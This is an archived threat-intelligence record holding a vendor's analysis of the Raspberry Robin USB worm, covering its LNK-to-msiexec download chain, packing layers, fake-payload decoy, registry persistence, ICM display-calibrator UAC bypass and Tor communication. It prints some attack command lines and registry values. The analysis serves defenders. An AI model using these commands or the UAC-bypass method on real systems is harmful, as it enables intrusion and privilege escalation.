{
	"id": "3fdff5c7-f3d1-43ec-a4a2-814f476ba343",
	"created_at": "2026-04-06T00:10:54.806248Z",
	"updated_at": "2026-04-10T03:21:47.045854Z",
	"deleted_at": null,
	"sha1_hash": "e39b2d0c2d496d922a6a22afc3cbc6c4329ed428",
	"title": "Raspberry Robin Malware Targets Telecom, Governments",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1476328,
	"plain_text": "Raspberry Robin Malware Targets Telecom, Governments\r\nBy Christopher So\r\nPublished: 2022-12-20 · Archived: 2026-04-05 22:36:36 UTC\r\nWe found a malware sample allegedly capable of connecting to the Tor network to deliver its payloads. Our initial analysis\r\nof the malware, which compromised a number of organizations toward the end of September, showed that while the main\r\nmalware routine contains both the real and fake payloads, it loads the fake payload once it detects sandboxing tools, to prevent\r\nsecurity and analysis tools from detecting and studying the malware's real routine. Meanwhile, the real payload remains\r\nobfuscated under packing layers and subsequently connects to the Tor network. The campaign and malware, identified as\r\nRaspberry Robin by Red Canary (detected by Trend Micro as Backdoor.Win32.RASPBERRYROBIN.A), seemingly spreads\r\nto systems with worm-like capabilities (due to the use of .lnk files) via an infected USB.\r\nGiven the malware’s layering features and the stages of its infection routine, we are still confirming its main motivation for\r\ndeployment. Currently, its possible motivation ranges from theft to cyberespionage. So far, we have noted the malware’s\r\ncapability to hide itself via multiple layers for obfuscation, as well as its feature of delivering a fake payload once the routine\r\ndetects sandboxing and analysis solutions. The group behind Raspberry Robin appears to be testing the waters to see how far\r\nits deployments can spread. The majority of the group’s victims are either government agencies or telecommunication entities\r\nfrom Latin America, Oceania (Australia), and Europe. Given the varying samples we have acquired since detecting these\r\ndeployments, we are continuing to monitor the developments for this malware as they occur.\r\nFigure 1. 
Percentage of Raspberry Robin detections worldwide from October to November\r\nArrival routine\r\nhttps://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html\r\nPage 1 of 10\n\nFigure 2. Raspberry Robin infection routine\r\nOnce the user connects the infected USB to the system, Raspberry Robin initially arrives as a shortcut or LNK file. The\r\nLNK file contains a command line that runs a legitimate executable to download a Windows Installer (MSI) package. This\r\nlegitimate executable is usually msiexec.exe, but we have also seen wmic.exe used in other samples.\r\nFigure 3. File containing a command line to run an executable\r\nWith obfuscation removed, the LNK file contains a target similar to the format \"cmd.exe /c start msiexec {URL}\". When the\r\nLNK file is double-clicked, the Windows Shell \"opens\" the shortcut file. In this case, \"open\" would mean \"execute\" since\r\nthe first item in the target is an executable file (cmd.exe). Cmd.exe then interprets anything after the switch /c as a command\r\nand executes it as if it were typed directly in a Command Prompt window. After executing the command, it exits. In this case,\r\nthe command is \"start msiexec {URL}\".\r\nWhen opened, the shortcut causes the target executable (cmd.exe) to run with its parameters; the parameter passed to msiexec is the URL\r\nof the MSI file hosting the main malware. The \"start\" command is commonly used to execute another program\r\nwithout waiting for it to exit. If it did not use \"start\", cmd.exe would have to wait for msiexec to terminate before terminating\r\nitself. The legitimate executable downloads the file, treats the downloaded data as an MSI (Windows Installer) package and, if successful,\r\nloads the main malware. 
The downloaded link has the following format:\r\nhttp[:]//{domain}:8080/{random strings and /}/\u003ccomputer name\u003e\r\nhttp[:]//{domain}:8080/{random strings and /}/\u003ccomputer name\u003e=\u003cuser name\u003e\r\nhttp[:]//{domain}:8080/{random strings and /}/\u003ccomputer name\u003e?\u003cuser name\u003e\r\nThe slashes in the LNK are a combination of forward slashes (/) and backslashes (\\). The domain is typically composed of\r\ntwo to four alphanumeric characters, followed by a dot and two additional characters.\r\nMain malware\r\nTo prevent researchers from analyzing this malware, Raspberry Robin’s main malware itself is packed multiple times, with\r\neach layer heavily obfuscated.\r\nCode obfuscation\r\nThe code is obfuscated in different ways. Starting from the third layer, each subroutine can be thought of as a state machine\r\nand implemented as a loop. At the start of each subroutine, the table of values is decrypted. This table of values serves as a\r\ncontainer for constant values used in the subroutine, as well as the state transition table.\r\nFigure 4. Each subroutine implemented as a loop\r\nAnother obfuscation technique used to hide the main malware obfuscates the call to other subroutines. In regular programs,\r\nthe address of another subroutine is in the call itself. In this malware, however, the address is computed using hard-coded\r\nvalues and values from the previously mentioned decrypted table of values. The result of this is placed in a register, and an\r\nindirect call is made using the register.\r\nFigure 5. Computing for the address using hard-coded values and table of values\r\nPacker characteristics\r\nThis malware is composed of two payloads embedded in a payload loader packed six times.\r\nFigure 6. 
A visual representation of Raspberry Robin’s packing\r\nThe first and second layers belong to a single packer. The code at the entry point of the first layer only has four instructions:\r\n1. A sequence of a call to unpack the embedded loader\r\n2. A sequence to unpack the payload\r\n3. A jump to the loader, setting the return value to 1\r\n4. The return instruction\r\nIn reality, however, this layer is typically obfuscated as shown by this code snippet:\r\nFigure 7. First and second layer packing\r\nDumping the second layer, we saw that the third layer is located just after the second layer code, at offset 0x3F0:\r\nFigure 8. Dumping the second layer and going to the third\r\nWe noted that layers 3 and 5 contain anti-analysis techniques. Meanwhile, we found that not all layers have unique packers.\r\nThe fourth and seventh layers are identical, as are the tenth and thirteenth. The packing of the eighth and fourteenth\r\nlayers is also similar. This repeated use of packers implies that the group is using a separate packing program. We are\r\ncontinuing with our analysis to see if this program is their own or if it is outsourced to other groups, as this technique can be\r\nindicative of the group’s future use of these same packers. It is also possible for these same packers to be replaced with\r\nvariations in patterns.\r\nOn layer 8, the payload loader, the execution splits into two paths. If the malware detects that it is being analyzed, it loads\r\nthe fake payload. Otherwise, it loads the real payload.\r\nFake payload\r\nThe fake payload has two layers, the first of which is a shellcode with an embedded PE file, while the second layer is a PE\r\nfile with the MZ header and PE signature removed. 
The first layer loads the second layer and jumps into it.\r\nUpon execution, the second layer immediately creates a thread at the location of its main routine. It first attempts to read\r\nthe registry value named “Active” at \u003cHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Media\u003e. This serves as an infection\r\nmarker. If the read fails, it proceeds to write the string value “1” into this registry value, then gathers system information: the\r\ncomputer name, current username, processor brand, and display device names. In some versions of the fake payload, the\r\ndata is encrypted using RC4 with a hard-coded key. The system information is then appended to the URL http[:]//{IP\r\naddress}:8080/. The full URL is then accessed, and a file is downloaded. In some versions of the malware, this downloaded\r\nfile is also executed.\r\nAnalyzing other sample versions of the fake payload, we found that if the main routine is successful, it checks if the system\r\nis joined to a domain by checking the existence of the environment variable USERDNSDOMAIN. If this variable does not\r\nexist, it drops and executes an adware named BrowserAssistant to %User Temp%\\{random number}.exe, likely to make an\r\nanalyst feel complacent about allegedly already finding the payload and therefore no longer needing to conduct further\r\nstudies of the samples.\r\nReal payload\r\nThe real payload is made up of three layers, with the third layer containing the actual payload binary packed twice. Within\r\nthe real payload is an embedded custom Tor client designed to communicate with the real payload using shared memory.\r\nInstallation\r\nIts method for checking whether the malware has been installed on the system involves checking if it is running in Session\r\n0. 
Prior to Windows Vista, services were run in the session of the first user to log in to the system, which is called Session 0.\r\nHowever, from Windows Vista onward, Microsoft introduced a security enhancement called “Session 0 Isolation,” where\r\nSession 0 is now reserved for services and other non-interactive user applications.\r\nWith this security enhancement, the threat actor confirms whether the user profile is running on administrative privileges or\r\nnot. If it is not in Session 0, it drops a copy of itself in \u003c%ProgramData%\\{random folder name}\\{random file name}.\r\n{extension}\u003e to elevate privileges, or \u003c%ProgramData%\\Microsoft\\{random folder name}\\{random file name}.{extension}\u003e\r\nif the user is running as an admin. In this manner, a security analyst would view the malicious routine as having been started\r\nand run by a legitimate Windows process, allowing the routine to evade detection. The extension name is randomly chosen\r\namong the following:\r\n.bak\r\n.dat\r\n.db\r\n.dmp\r\n.etl\r\n.idx\r\n.json\r\n.lkg\r\n.lock\r\nlog\r\n.man\r\n.tmp\r\ntxt\r\n.vdm\r\n.xml\r\n.xsd\r\nIt also sets the following registry entry to enable its automatic execution at system startup. 
If the user is not at an admin\r\nlevel, the malware modifies the registry with \r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\r\n{random value name} = “rundll32 shell32 ShellExec_RunDLLA REGSVR /u /s “{dropped copy path and file name}.””\r\nInversely, if the user’s profile is with admin privileges, the registry is modified with\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\{random key name}\r\n{random value name} = “shell32|ShellExec_RunDLLA|REGSVR /u /s “{dropped copy path and file name}.””\r\nPrivilege escalation\r\nAfter dropping a copy of itself, it executes the dropped copy as Administrator using a UAC (User Account Control) bypass\r\ntechnique. It implements a variation of the technique ucmDccwCOMMethod in UACMe, thereby abusing the built-in\r\nWindows AutoElevate backdoor.\r\nIt first checks whether atcuf32.dll, aswhook.dll, and avp.exe are loaded in the system. These files belong to the security products\r\nBitDefender, Avast, and Kaspersky, respectively. If one of these is loaded, it does not proceed to the UAC bypass routine. It\r\nthen drops a shortcut file to \u003c%User Temp%\\{random file name}.lnk\u003e that contains the command line\r\nrundll32.exe SHELL32,ShellExec_RunDLL \"C:\\Windows\\system32\\ODBCCONF.EXE\" /a {configsysdsn\r\nOCNKBENXGMI etba odjcnr} /A {installtranslator fxodi} -a {installdriver qmprmxf} /a {configsdn HHAP} regsvr \"\r\n{dropped copy path and file name}.\" /S /e -s\r\nIt then creates an elevated COM object for CMLuaUtil and uses it to set a custom display calibrator in the registry that\r\npoints to the dropped LNK file. 
It sets the custom display calibrator by setting the registry value\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration\r\nDisplayCalibrator = \"%User Temp%\\{random file name}.lnk\"\r\nIt then creates an elevated COM object for ColorDataProxy and calls its method “LaunchDccw” to load the calibrator, thus\r\nexecuting the malicious LNK. Afterward, it sets the registry value DisplayCalibrator to\r\n“%SystemRoot%\\System32\\DCCW.exe” to hide its activity.\r\nMain routine\r\nRunning in Session 0, the real payload attempts to connect to the hard-coded Tor addresses, where the connections are made\r\nin another process. To let the real payload and the Tor-connecting process exchange information, a named shared-memory map is created with the following format:\r\nTable 1. Shared memory map format\r\nOffset Size Description\r\n00h 1 Flag\r\n01h 1 Success\r\n04h 4 (DWORD) IP address\r\n08h 8 (FILETIME)\r\n10h 4 (DWORD) Data size\r\n14h Data size Data\r\nThe Tor address is written to offset 14h of the shared memory; it is hard-coded but encrypted within the sample itself. 
The\r\nfollowing are some of the .onion (V2) addresses we identified:\r\nsejnfjrq6szgca7v\r\nzdfsyv3rubuhpql3\r\nihdhoeoovbtgutfm\r\ntapeucwutvne7l5o\r\n2qlvvvnhqyda2ahd\r\nanswerstedhctbek\r\n5j7saze5byfqccf3\r\ncmgvqnxjoiqthvrc\r\n3bbaaaccczcbdddz\r\nsgvtcaew4bxjd7ln\r\nugw3zjsayleoamaz\r\nynvs3km32u33agwq\r\nnjalladnspotetti\r\npsychonaut3z5aoz\r\nhabaivdfcyamjhkk\r\ntorwikignoueupfm\r\nbitmailendavkbec\r\ncyphdbyhiddenbhs\r\nclgs64523yi2bkhz\r\n76qugh5bey5gum7l\r\nhd37oiauf5uoz7gg\r\nexpressobutiolem\r\ngl3n4wtekbfaubye\r\narchivecaslytosk\r\nkyk55bof3hzdiwrm\r\nqqvyib4j3fz66nuc\r\nbcwpy5wca456u7tz\r\npornhubthbh7ap3u\r\nfncuwbiisyh6ak3i\r\nIn starting its Tor client process, the real payload randomly selects a name among these first:\r\ndllhost.exe\r\nregsvr32.exe\r\nrundll32.exe\r\nIt then creates a suspended process, injects the code of the Tor client, resumes the process, and waits for data from the Tor\r\nclient. As for what the sample does with the received data, we have not seen any use of it in the wild so far: we found\r\nthat the buffer containing the data is freed without being used.\r\nTor client\r\nThe Tor client itself is composed of four layers. The first two layers are packer codes. The third layer retrieves the Tor\r\naddress from the shared memory, unpacks the fourth layer, and calls the fourth layer to do the actual Tor communication.\r\nThe data received by the fourth layer is encrypted by the third layer and written to the shared memory, to be read by the\r\nmain routine.\r\nConclusion\r\nNoticeably, the malware uses many anti-analysis techniques, while its main payload is packed with many layers that require\r\nanalysis. Therefore, an analyst who lacks experience will find only the fake payload. 
Clearly, the actor behind this has made\r\nconsiderable effort to hinder analysis.\r\nWhile the technique of packing the codes is not unique, some of the packing layers have very similar codes and can be\r\ngrouped into packer families. The style of packing is also similar on all layers except for the first two: An executable is\r\nstripped of some header information, encrypted, and added to the unpacking code. The group must therefore be using\r\nsomething akin to a packed sample generator, which takes a payload executable and produces a multi-layered packed\r\nsample. On the surface, it looks like the group could be providing this as \"packing service\" or \"executable packing-as-a-service\" (if there is such a term), and the people behind this could be associated with the threat actors behind LockBit. We\r\ncontinue to analyze and document all the anti-debugging techniques and layers used in these samples and incidents.\r\nThe use of Session 0 is also sophisticated. The purpose of Session 0 Isolation is to increase system security by preventing\r\nservices running in the local system account from having user interactions. Isolating services in their own non-interactive sessions\r\ninaccessible by regular processes will decrease the chances of abuse to elevate another piece of (malicious) code's privileges.\r\nHence, having access to Session 0 would mean privilege escalation. However, an attacker must use privilege escalation\r\ntechniques to gain access.\r\nFrom the samples we gathered, we found the abuse of the elevated COM interface. Making one of those elevated COM\r\nclasses execute the code implies that the malicious actor’s access is also automatically elevated, provided the threat actor\r\nfinds the specific COM class that can accept a program name (or something similar) and trigger it to run. In this case, it's\r\nImage Color Management. 
Display calibration is done by a program that is specified in a registry entry. By replacing or\r\nadding that entry and then triggering the system to perform display calibration, whatever is specified in that registry entry\r\nwill be executed.\r\nIt is also noteworthy that the ICM calibration technique was previously seen in the LockBit ransomware as far as privilege\r\nescalation is concerned. There is also the similarity of the anti-debugging technique using ThreadHideFromDebugger.\r\nHowever, even if Raspberry Robin uses the same techniques, we cannot conclude for certain that the actors behind LockBit\r\nand Raspberry Robin are the same. Still, since LockBit operates as a ransomware-as-a-service (RaaS) group, some of the\r\nfollowing could still be true:\r\nThe group behind LockBit is also behind Raspberry Robin.\r\nThe group behind Raspberry Robin is the maker of some of the tools LockBit is also using.\r\nThe group behind Raspberry Robin availed of the services of the affiliate responsible for the techniques used by\r\nLockBit.\r\nGiven that the returned data is empty and was not used, it seems that the actor has been trying to see how far its campaign\r\noperation can spread, most likely as part of its reconnaissance effort. We can thus consider this an indication of a possible\r\nroutine for the group’s long-term plans, as well as a possible precursor to a follow-up operation in the future.\r\nIndicator of Compromise (IOC)\r\nSHA256 Description Detection name\r\n6fb0ad3f756b5d1f871cf34c3e4ea47cb34643cd17709a09c25076c400313adf Main malware executable Backdoor.Win32.RASPBERRYROBI\r\nSource: https://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html"
	],
	"report_names": [
		"raspberry-robin-malware-targets-telecom-governments.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434254,
	"ts_updated_at": 1775791307,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e39b2d0c2d496d922a6a22afc3cbc6c4329ed428.pdf",
		"text": "https://archive.orkl.eu/e39b2d0c2d496d922a6a22afc3cbc6c4329ed428.txt",
		"img": "https://archive.orkl.eu/e39b2d0c2d496d922a6a22afc3cbc6c4329ed428.jpg"
	}
}